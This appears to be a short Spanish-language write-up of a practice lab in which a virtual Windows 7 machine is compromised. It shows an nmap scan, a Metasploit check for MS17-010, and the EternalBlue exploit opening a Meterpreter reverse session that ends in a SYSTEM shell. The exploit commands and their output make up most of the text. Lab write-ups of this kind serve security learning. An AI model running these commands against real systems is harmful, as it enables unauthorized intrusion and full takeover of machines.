Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.85.196❯ nmap -sCV -p 135,139,445,5357,49152,49153,49154,49155,49156,49157 -Pn -oN 02-targeted.txt 192.168.85.196
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-30 15:41 -03
Nmap scan report for 192.168.85.196
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MIKE-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: MIKE-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:d8:fe:bf (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-10-30T14:42:55
|_ start_date: 2024-10-30T14:38:53
| smb-os-discovery:
| OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: MIKE-PC
| NetBIOS computer name: MIKE-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-10-30T15:42:55+01:00
|_clock-skew: mean: -4h20m01s, deviation: 34m37s, median: -4h00m02s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.37 secondsSe trata de un Windows 7 SP1 con SMB expuesto, candidato directo a EternalBlue. Lo confirmamos con el módulo auxiliar de Metasploit:
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.85.196
rhosts => 192.168.85.196
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.85.196:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.85.196:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedLanzamos el exploit de EternalBlue, que nos otorga una sesión Meterpreter como NT AUTHORITY\SYSTEM:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.85.196
rhosts => 192.168.85.196
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
...
[*] Meterpreter session 1 opened (192.168.85.50:4444 -> 192.168.85.196:49158) at 2024-10-30 15:46:47 -0300
meterpreter > shell
Process 1356 created.
Channel 1 created.
Microsoft Windows [Versi�n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows\system32>whoami
whoami
nt authority\systemObtenemos ambas flags y fin.